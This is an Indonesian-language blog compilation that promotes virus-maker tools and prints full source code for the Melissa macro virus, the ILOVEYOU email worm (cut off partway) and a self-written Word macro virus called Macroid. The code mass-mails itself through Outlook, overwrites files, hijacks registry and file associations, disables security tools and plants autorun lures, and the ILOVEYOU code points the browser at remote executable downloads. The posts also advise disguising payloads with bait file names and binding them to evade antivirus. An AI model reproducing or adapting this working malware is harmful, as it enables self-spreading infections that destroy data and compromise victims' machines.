Tutorial Membuat VIrus

Ingin jadi Virus Maker dengan cara yang simple? pengen bisa bikin virus tanpa perlu belajar bahasa pemrograman? kali ini saya ingin membagi pengetahuan mengenai cara menjadi ViMi tanpa perlu dasar pemrograman yang kuat, karena hanya dengan beberapa klik, anda sudah dapat membuat virus yang tak kalah hebatnya dengan virus Brontok maupun Anna Kournikova.

Sebenernya banyak tool atau program instant untuk membuat virus yang hebat dan berbahaya, salah satunya dengan Terabit Virus Maker ini, Dan ingat Sebaiknya komputer anda dalam keadaan aman, terinstall deepfreeze dan aktif sehingga komputer lebih aman.


SEGALA RESIKO YANG DITIMBULKAN AKIBAT PROGRAM INI 100% ADALAH TANGGUNG JAWAB ANDA SENDIRI. JADI JIKA RAGU, LEBIH BAIK TIDAK USAH DICOBA. DAN PASTIKAN DEEPFREEZE PADA KOMPUTER ANDA TELAH AKTIF.

Download Terabit Virus Maker

Source Code VIrus Mellisa

kali ini saya ingin memberikan source code virus mellisa yg terkenal itu dan bagi anda yg sudah mengerti tentang VB, silahkan anda coba oprek sendiri virus mellisa ini, dan bagi yg belum bisa, silahkan cari sendiri tutornya yah ^^

Virus Mellisa Source Code:

Private Sub AutoOpen()
On Error Resume Next
p$ = "clone"
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Else
p$ = "clone"
CommandBars("Tools").Controls("Macro").Enabled = False
Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1)
End If
Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
Set UngaDasOutlook = CreateObject("Outlook.Application")
Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <> "... by Kwyjibo" Then
If UngaDasOutlook = "Outlook" Then
DasMapiName.Logon "profile", "password"
For y = 1 To DasMapiName.AddressLists.Count
Set AddyBook = DasMapiName.AddressLists(y)
x = 1
Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
For oo = 1 To AddyBook.AddressEntries.Count
Peep = AddyBook.AddressEntries(x)
BreakUmOffASlice.Recipients.Add Peep
x = x + 1
If x > 50 Then oo = AddyBook.AddressEntries.Count
Next oo
BreakUmOffASlice.Subject = "Important Message From " & Application.UserName
BreakUmOffASlice.Body = "Here is that document you asked for ... don't show anyone else ;-)"
BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
BreakUmOffASlice.Send
Peep = ""
Next y
DasMapiName.Logoff
End If
p$ = "clone"
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") = "... by Kwyjibo"
End If
Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)
Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)
NTCL = NTI1.CodeModule.CountOfLines
ADCL = ADI1.CodeModule.CountOfLines
BGN = 2
If ADI1.Name <> "Melissa" Then
If ADCL > 0 Then _
ADI1.CodeModule.DeleteLines 1, ADCL
Set ToInfect = ADI1
ADI1.Name = "Melissa"
DoAD = True
End If
If NTI1.Name <> "Melissa" Then
If NTCL > 0 Then _
NTI1.CodeModule.DeleteLines 1, NTCL
Set ToInfect = NTI1
NTI1.Name = "Melissa"
DoNT = True
End If
If DoNT <> True And DoAD <> True Then GoTo CYA
If DoNT = True Then
Do While ADI1.CodeModule.Lines(1, 1) = ""
ADI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()")
Do While ADI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
p$ = "clone"
If DoAD = True Then
Do While NTI1.CodeModule.Lines(1, 1) = ""
NTI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()")
Do While NTI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
CYA:
If NTCL <> 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name, "Document") = False) Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then
ActiveDocument.Saved = True: End If
'WORD/Melissa written by Kwyjibo
'Clone written by Duke/SMF
'Works in both Word 2000 and Word 97
'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide!
'Word -> Email | Word 97 <--> Word 2000 ... it's a new age!
If Day(Now) = Minute(Now) Then Selection.TypeText "Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game's over. I'm outta here."
End Sub

Source Virus I Love U

rem barok -loveletter(vbe)
rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group /
Manila,Philippines
On Error Resume Next
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow
eq=""
ctr=0
Set fso = CreateObject("Scripting.FileSystemObject")
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll
main()
sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject("WScript.Shell")
rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting
Host\Settings\Timeout")
if (rr>=1) then
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting
Host\Settings\Timeout",0,"REG_DWORD"
end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
regruns()
html()
spreadtoemail()
listadriv()
end sub
sub regruns()
On Error Resume Next
Dim num,downread
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32
",dirsystem&"\MSKernel32.vbs"
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Wi
n32DLL",dirwin&"\Win32DLL.vbs"
downread=""
downread=regget("HKEY_CURRENT_USER\Software\Microsoft\Internet
Explorer\Download Directory")
if (downread="") then
downread="c:\"
end if
if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
Randomize
num = Int((4 * Rnd) + 1)
if num = 1 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnj
w6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe"
elseif num = 2 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe
546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
elseif num = 3 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnm
POhfgER67b3Vbvg/WIN-BUGSFIX.exe"
elseif num = 4 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkh
YUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX
.exe"
end if
end if
if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFI
X",downread&"\WIN-BUGSFIX.exe"
regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start
Page","about:blank"
end if
end sub
sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path&"\")
end if
Next
listadriv = s
end sub
sub infectfiles(folderspec)
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
set f = fso.GetFolder(folderspec)
set fc = f.Files
for each f1 in fc
ext=fso.GetExtensionName(f1.path)
ext=lcase(ext)
s=lcase(f1.name)
if (ext="vbs") or (ext="vbe") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct")
or (ext="hta") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
bname=fso.GetBaseName(f1.path)
set cop=fso.GetFile(f1.path)
cop.copy(folderspec&"\"&bname&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="jpg") or (ext="jpeg") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
set cop=fso.GetFile(f1.path)
cop.copy(f1.path&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="mp3") or (ext="mp2") then
set mp3=fso.CreateTextFile(f1.path&".vbs")
mp3.write vbscopy
mp3.close
set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
end if
if (eq<>folderspec) then
if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or
(s="script.ini") or (s="mirc.hlp") then
set scriptini=fso.CreateTextFile(folderspec&"\script.ini")
scriptini.WriteLine "[script]"
scriptini.WriteLine ";mIRC Script"
scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt,
if mIRC will"
scriptini.WriteLine " corrupt... WINDOWS will affect and will not run
correctly. thanks"
scriptini.WriteLine ";"
scriptini.WriteLine ";Khaled Mardam-Bey"
scriptini.WriteLine ";http://www.mirc.com"
scriptini.WriteLine ";"
scriptini.WriteLine "n0=on 1:JOIN:#:{"
scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }"
scriptini.WriteLine "n2= /.dcc send $nick
"&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
scriptini.WriteLine "n3=}"
scriptini.close
eq=folderspec
end if
end if
next
end sub
sub folderlist(folderspec)
On Error Resume Next
dim f,f1,sf
set f = fso.GetFolder(folderspec)
set sf = f.SubFolders
for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next
end sub
sub regcreate(regkey,regvalue)
Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite regkey,regvalue
end sub
function regget(value)
Set regedit = CreateObject("WScript.Shell")
regget=regedit.RegRead(value)
end function
function fileexist(filespec)
On Error Resume Next
dim msg
if (fso.FileExists(filespec)) Then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
function folderexist(folderspec)
On Error Resume Next
dim msg
if (fso.GetFolderExists(folderspec)) then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
sub spreadtoemail()
On Error Resume Next
dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad
set regedit=CreateObject("WScript.Shell")
set out=WScript.CreateObject("Outlook.Application")
set mapi=out.GetNameSpace("MAPI")
for ctrlists=1 to mapi.AddressLists.Count
set a=mapi.AddressLists(ctrlists)
x=1
regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a)
if (regv="") then
regv=1
end if
if (int(a.AddressEntries.Count)>int(regv)) then
for ctrentries=1 to a.AddressEntries.Count
malead=a.AddressEntries(x)
regad=""
regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead)
if (regad="") then
set male=out.CreateItem(0)
male.Recipients.Add(malead)
male.Subject = "ILOVEYOU"
male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me."
male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
male.Send
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead,1,"REG_DWORD"
end if
x=x+1
next
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
else
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
end if
next
Set out=Nothing
Set mapi=Nothing
end sub
sub html
On Error Resume Next
dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6
dta1=""&vbcrlf& _
""&vbcrlf& _
""&vbcrlf& _
""&vbcrlf& _
"

JPS Virus Maker V.3

Download JPS Virus Maker V.3

Satu lagi, program pembuat virus dengan mudah, JPS Virus Maker V.3 yang dibuat menggunakan Delphi. Kita dapat mengganti nama dengan yang lebih menarik, pada gambar dibawah ini, saya membuat 2contoh hasil dari jps virus maker ini, yang satu menggunakan icon setup dengan nama sender sedangkan yg satu menggunakan icon pdf dengan nama Majalah Playboy edisi may 2008. Mana yang lebih membuat orang penasar untuk membuka? inti dari sebuah virus adalah gimana penyebaran tersebut dapat cepat dilakukan. Dan lebih baik lagi jika file virus tersebut di binding menggunakan Demon Binding, sehingga sulit terdeteksi sebagai virus. Sayang saya lupa naro Softwarenya :( tp laen kali pasti saya postingin deh ;)



Features:

Disable Registry Editor
Disable Ms Config
Disable Task Manager
Disable Yahoo! Messenger
Disable Media Player
Disable Internet Explorer
Disable Time
Disable Group Policy
Disable Windows Explorer
Disable Norton Antivirus
Disable McAfee Antivirus
Disable Note Pad
Disable Word Pad
Disable Winows
Disable DHCP Client Service
Disable Taskbar
Disable Start Button
Disable MSN Messenger
Disable Command Prompt
Disable Security Center
Disable MSN Messenger
Disable System Restore
Disable Control Panel
Disable Desktop Icons
Disable Screen Saver
Hide Service Manager
Hide Outlook Express
Hide Windows Clock
Hide Desktop Icons
Hide All Process in Task Manager
Hide All Tasks in Task Manager
Hide Run in Start Menu
Change Explorer Caption
Clear Windows XP Password
Swap Mouse Buttons
Remove Folder Options
Lock Mouse & Keyboards
Mute Sound
Crazy Mouse
Allways CD-ROM Open
Turn Off Monitor (30 sec's)
Destroy Taskbar
Destroy Offlines (Y!Messenger)
Destroy Protected Strorage
Destroy Audio Service
Destroy Clipboard
Terminate Windows
Hide Cursor
Auto Startup
Restart-Logoff-Turnoff-Hibrinate Automatic After 30 minutes
Change Server Name After Install in Process
Change Server Name
-------------------------------------
New Fetures in Version 3.0:

Change XP Password
Change Computer Name
Change IE Home Page
Close Custom Windows
Disable Custom Service
Disable Process
Open Custom Website
Run Custom Command
Enable Convert To Worm - Auto Copy Server To Active Path With Custom Name & Time
Change Custom Icon For Server (15 Icons)

Virus Paling Danger bisa bikin harddisk gak bisa kepake lagi

Percaya atau tidak.. virus ini sangat berbahaya karena bisa bikin harddisk gk bekerja lagi. Menggunakan bash language, bentuk file .bat tetapi sudah Saya compile ke exe. Bagi yang ingin tau source codenya, silahkan download disini
, atau file exe nya download disini

BB's Virus Suit

BB's Virus Suite Content:

1. BB's Media Player
2. Extras:
- Matrix Batch
- ieexpress
- windows genie
- cmd account
3. Sample Virus Code
4. Pop-up Maker Classic
5. Windows Attacker Classic
6. Jakash3 Remote
7. Popmaker
8. String Editor
9. Many more...


File type: Rar
Size: 4.62 Mb

Download

Dr. VBS VIrus Maker

Download Dr. VBS Virus Maker

Penulis hadirkan kembali program untuk membuat virus dengan cara yang sangat mudah dan cepat. Program ini direkomendasikan bagi anda yang tertarik dengan masalah virulogi, tapi tidak memiliki cukup waktu atau belum mengerti tentang bahasa pemrograman.

Now, Everyone can be a Virus Maker.

Cara menggunakan program ini sangat mudah. Pertama, anda buka file Dr. VBS Virus MAker.exe. Kemudian copy pastekan source virus yang telah di attached dalam folder source ke dalam program tersebut. Beberapa source code yang diberikan adalah Antideletion yaitu untuk membuat kembali virus yang didelete, Start UP adalah untuk membuat virus buatan anda dapat berjalan pada saat awal komputer di hidupkan, dll.
Selain itu, anda juga dapat menggunakan source code virus lain yang telah penulis berikan pada postingan - postingan sebelumnya agar virus buatan anda lebih Powerfull.

Be a Wise Hacker! Don't use hacking for cracking, use it for education.

Virus Tutorial : Tehnik Membuat Virus Macro By Wong Liyo

(Baca: ilmu dalam tutorial ini untuk pembelajaran bukan untuk disalahgunakan)

Ini adalah tutorial saya yang kesekian kalinya dan mudah-mudahan tutorial kali ini bermanfaat untuk kalian.

Kali ini saya akan membahas mengenai virus macro... (para virus maker diharap untuk tenang dulu!).

Pasti banyak bertanya kenapa kali ini Morphic membahas tentang cara membuat virus? Biasanya kan Morphic lebih sering membahas analisis virus atau antivirusnya itu….

Yah kali ini memang agak berbeda. Selain untuk mencari suasana baru, aku juga agak tertantang dengan artikel yang saya buat ini.

Sebelum aku membuat artikel ini, aku sengaja mencari-cari kelemahan dari antivirusku sendiri (baca:Morphost). Ternyata aku lebih tertarik untuk membuat virus macro untuk mencari celah antivirusku itu. Untuk membuat artikel ini memang butuh pengorbanan juga. Soalnya komputerku jadi terinfeksi oleh virusku sendiri. Haaahhh…..

Virus macro merupakan virus yang dibuat dalam bahasa pemrograman visual basic macro di Microsoft Office. Kita ambil contoh, virus macro Word.

CARA MEMBUAT VIRUS MACRO

Buka Ms.Word (hanya contoh)

buka tools > Macro> Visual Basic Editor



Akan muncul gambar di bawah



Lalu kita ketikkan source virus nya pada kotak putih diatas dan akan tampak gambar seperti dibawah ini.



Sekarang muncul pertanyaan! Source yang bagaimana yang harus diketik???

Tenang, aku dah siapkan kok sourcenya. Makan neh source code!


'This is my code's virus


'


'Fuck Gates. Your software has small weakness. Watch it!


'


'Macro Viruses


'[Macroid]


'


'Hanya untuk pembelajaran




Private Sub Document_Close()


Dim AD, NT As Object


Dim isi As String


Set AD = ActiveDocument.VBProject.VBComponents.Item(1)


Set NT = NormalTemplate.VBProject.VBComponents.Item(1)




If AD.Name <> "Macroid" Then


AD.CodeModule.DeleteLines 1, AD.CodeModule.CountOfLines


AD.Name = "Macroid"


isi = NT.CodeModule.Lines(1, NT.CodeModule.CountOfLines)


AD.CodeModule.AddFromString isi


ActiveDocument.Save


End If




If NT.Name <> "Macroid" Then


NT.CodeModule.DeleteLines 1, NT.CodeModule.CountOfLines


NT.Name = "Macroid"


isi = AD.CodeModule.Lines(1, AD.CodeModule.CountOfLines)


NT.CodeModule.AddFromString isi


NormalTemplate.Save


End If




If InStr(ActiveDocument.Content, "Macroid") = 0 Then


ActiveDocument.Content = "[Macroid]" & vbCrLf & ActiveDocument.Content & vbCrLf & vbCrLf & vbCrLf & "[Macroid] by Morphic" & vbCrLf & "copyright(c) Medan Juli-2008"


End If




On Error Resume Next


Dim b As Object


Set b = CreateObject("Wscript.Shell")


b.regwrite "HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\Window Title", "Browser Internet ini diambil alih oleh Macroid"


b.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption", "Macroid"


b.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization", "Macroid"


b.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner", "VM-Morphic"


b.regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText", "Macroid-A. Eat this!!! Ha ha ha"


b.regwrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden", "2"


b.regwrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind", "1"


b.regwrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", "1"


b.regwrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun", "1"


b.regwrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", "1"


b.regwrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", "1"


b.regwrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", "1"


b.regwrite "HKLM\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\", "Tong Sampah Macroid"


b.regwrite "HKLM\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\", "Komputer Morphic"


b.regwrite "HKLM\SOFTWARE\Classes\exefile\shell\open\command\", "Winword.exe " & Environ$("windir") & "\Macroid.doc"


b.regwrite "HKLM\SOFTWARE\Classes\comfile\shell\open\command\", "Winword.exe " & Environ$("windir") & "\Macroid.doc"


b.regwrite "HKLM\SOFTWARE\Classes\vbsfile\shell\edit\command\", "Winword.exe " & Environ$("windir") & "\Macroid.doc"


b.regwrite "HKLM\SOFTWARE\Classes\txtfile\shell\open\command\", "Winword.exe " & Environ$("windir") & "\Macroid.doc"


b.regwrite "HKLM\SOFTWARE\Classes\scrfile\shell\open\command\", "Winword.exe " & Environ$("windir") & "\Macroid.doc"


b.regwrite "HKLM\SOFTWARE\Classes\batfile\shell\open\command\", "Winword.exe " & Environ$("windir") & "\Macroid.doc"


b.regwrite "HKLM\SOFTWARE\Classes\Folder\shell\", "0pen"


b.regwrite "HKLM\SOFTWARE\Classes\Folder\shellpen\", "&Open"


b.regwrite "HKLM\SOFTWARE\Classes\Folder\shellpen\command\", "wscript.exe " & Environ$("windir") & "\avmc.vbs"


b.regwrite "HKLM\SOFTWARE\Classes\VisualBasic.Project\shell\open\command\", "Winword.exe " & Environ$("windir") & "\Macroid.doc"




On Error Resume Next


Dim rog As Integer


Dim atr, vbs, Tipu(10), Trik(10) As String


For a = 66 To 90


partisi = Chr$(a)


vbs = partisi & ":\auto.vbs"


atr = partisi & ":\autorun.inf"


Tipu(1) = partisi & ":\Soal SPMB 1995-2008.doc"


Tipu(2) = partisi & ":\Kisah di balik HarryPotter.doc"


Tipu(3) = partisi & ":\Titip File sebentar.doc"


Tipu(4) = partisi & ":\jangan di baca.doc"


Tipu(5) = partisi & ":\buku harian.doc"


Tipu(6) = partisi & ":\cerita hangat.doc"


Tipu(7) = partisi & ":\Punya Baim.doc"


Tipu(8) = partisi & ":\Teka-teki yang baru.doc"


Tipu(9) = partisi & ":\Kumpulan cerita lucu.doc"


Tipu(10) = partisi & ":\Trik Sulap.doc"


If Dir(Tipu(1)) = "" And Dir(Tipu(2)) = "" And Dir(Tipu(3)) = "" And Dir(Tipu(4)) = "" And Dir(Tipu(5)) = "" And Dir(Tipu(6)) = "" And Dir(Tipu(7)) = "" And Dir(Tipu(8)) = "" And Dir(Tipu(9)) = "" And Dir(Tipu(10)) = "" Then


Randomize


rog = Int(10 * Rnd) + 1


Open Tipu(rog) For Output As #1


Print #1, ""


Close #1


End If


Trik(1) = partisi & ":\Novel J.K.Rowling.doc"


Trik(2) = partisi & ":\cerita cinta.doc"


Trik(3) = partisi & ":\Ringkasan cerita HarryPotter.doc"


Trik(4) = partisi & ":\Semua Cheat game DOTA.doc"


Trik(5) = partisi & ":\Kumpulan Cheat game.doc"


Trik(6) = partisi & ":\Cheat game RF.doc"


Trik(7) = partisi & ":\Cheat game Ayo Dance.doc"


Trik(8) = partisi & ":\Goosebumps.doc"


Trik(9) = partisi & ":\FearStreet.doc"


Trik(10) = partisi & ":\R.L.Stine.doc"




If Dir(Trik(1)) = "" And Dir(Trik(2)) = "" And Dir(Trik(3)) = "" And Dir(Trik(4)) = "" And Dir(Trik(5)) = "" And Dir(Trik(6)) = "" And Dir(Trik(7)) = "" And Dir(Trik(8)) = "" And Dir(Trik(9)) = "" And Dir(Trik(10)) = "" Then


Randomize


rogi = Int(10 * Rnd) + 1


Open Trik(rogi) For Output As #1


Print #1, ""


Close #1


End If


Open atr For Output As #1


Print #1, "[Autorun]"


Print #1, "shell\Open\command=wscript.exe auto.vbs"


Close #1


SetAttr atr, vbHidden + vbSystem


Open vbs For Output As #1


Print #1, "dim a"


Print #1, "set a = createobject(" & Chr(34) & "Wscript.shell" & Chr(34) & ")"


Print #1, "a.regwrite " & Chr(34) & "HKCU\Software\Microsoft\Office\10.0\Word\Security\Level" & Chr(34) & "," & Chr(34) & "1" & Chr(34) & "," & Chr(34) & "REG_DWORD" & Chr(34)


Print #1, "a.regwrite " & Chr(34) & "HKCU\Software\Microsoft\Office\11.0\Word\Security\Level" & Chr(34) & "," & Chr(34) & "1" & Chr(34) & "," & Chr(34) & "REG_DWORD" & Chr(34)


Print #1, "a.regwrite " & Chr(34) & "HKCU\Software\Microsoft\Office\12.0\Word\Security\Level" & Chr(34) & "," & Chr(34) & "1" & Chr(34) & "," & Chr(34) & "REG_DWORD" & Chr(34)


Close #1


SetAttr vbs, vbHidden + vbSystem


Next a




If Dir(Environ$("windir") & "\Macroid.doc") = "" Then


Dim isicrita As String


isicrita = "[Macroid] by Morphic" & vbCrLf & "Copyright(c) Medan Juli-2008" & vbCrLf & vbCrLf & _


Chr(34) & "Ms.Word is a thing that can be used as a power to break everything.... " & Chr(34) & vbCrLf & "(Morphic)"


Open Environ$("windir") & "\Macroid.doc" For Output As #1


Print #1, isicrita


Close #1


End If




If Dir(Environ$("windir") & "\avmc.vbs") = "" Then


Open Environ$("windir") & "\avmc.vbs" For Output As #1


Print #1, "set fs = createobject(" & Chr(34) & "Scripting.FileSystemObject" & Chr(34) & ")"


Print #1, "for each FD in fs.drives"


Print #1, "if (FD.Drivetype = 1) and FD.Path <> " & Chr(34) & "A:" & Chr(34) & " then"


Print #1, "set tf = fs.CreateTextFile(FD.Path" & Chr(38) & Chr(34) & "\Jangan di baca.doc" & Chr(34) & ")"


Print #1, "end if"


Print #1, "Next"


Close #1


End If


ActiveDocument.Save


NormalTemplate.Save


End Sub




Private Sub Document_Open()


CommandBars("Tools").Controls("Macro").Visible = False


CommandBars("Tools").Controls("Macro").Enabled = False


CommandBars("Tools").Controls("Customize...").Visible = False


CommandBars("Tools").Controls("Options...").Visible = False




Dim AD, NT As Object


Dim isi As String


Set AD = ActiveDocument.VBProject.VBComponents.Item(1)


Set NT = NormalTemplate.VBProject.VBComponents.Item(1)




If AD.Name <> "Macroid" Then


AD.CodeModule.DeleteLines 1, AD.CodeModule.CountOfLines


AD.Name = "Macroid"


isi = NT.CodeModule.Lines(1, NT.CodeModule.CountOfLines)


AD.CodeModule.AddFromString isi


ActiveDocument.Save


End If




If NT.Name <> "Macroid" Then


NT.CodeModule.DeleteLines 1, NT.CodeModule.CountOfLines


NT.Name = "Macroid"


isi = AD.CodeModule.Lines(1, AD.CodeModule.CountOfLines)


NT.CodeModule.AddFromString isi


NormalTemplate.Save


End If




If InStr(ActiveDocument.Content, "Macroid") = 0 Then


ActiveDocument.Content = "[Macroid]" & vbCrLf & ActiveDocument.Content & vbCrLf & vbCrLf & vbCrLf & "[Macroid] by Morphic" & vbCrLf & "copyright(c) Medan Juli-2008"


End If




On Error Resume Next


Dim b As Object


Set b = CreateObject("Wscript.Shell")


b.regwrite "HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\Window Title", "Browser Internet ini diambil alih oleh Macroid"


b.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption", "Macroid"


b.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization", "Macroid"


b.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner", "VM-Morphic"


b.regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText", "Macroid-A. Eat this!!! Ha ha ha"


b.regwrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden", "2"


b.regwrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind", "1"


b.regwrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", "1"


b.regwrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun", "1"


b.regwrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", "1"


b.regwrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", "1"


b.regwrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", "1"


b.regwrite "HKLM\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\", "Tong Sampah Macroid"


b.regwrite "HKLM\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\", "Komputer Morphic"


b.regwrite "HKLM\SOFTWARE\Classes\exefile\shell\open\command\", "Winword.exe " & Environ$("windir") & "\Macroid.doc"


b.regwrite "HKLM\SOFTWARE\Classes\comfile\shell\open\command\", "Winword.exe " & Environ$("windir") & "\Macroid.doc"


b.regwrite "HKLM\SOFTWARE\Classes\vbsfile\shell\edit\command\", "Winword.exe " & Environ$("windir") & "\Macroid.doc"


b.regwrite "HKLM\SOFTWARE\Classes\txtfile\shell\open\command\", "Winword.exe " & Environ$("windir") & "\Macroid.doc"


b.regwrite "HKLM\SOFTWARE\Classes\scrfile\shell\open\command\", "Winword.exe " & Environ$("windir") & "\Macroid.doc"


b.regwrite "HKLM\SOFTWARE\Classes\batfile\shell\open\command\", "Winword.exe " & Environ$("windir") & "\Macroid.doc"


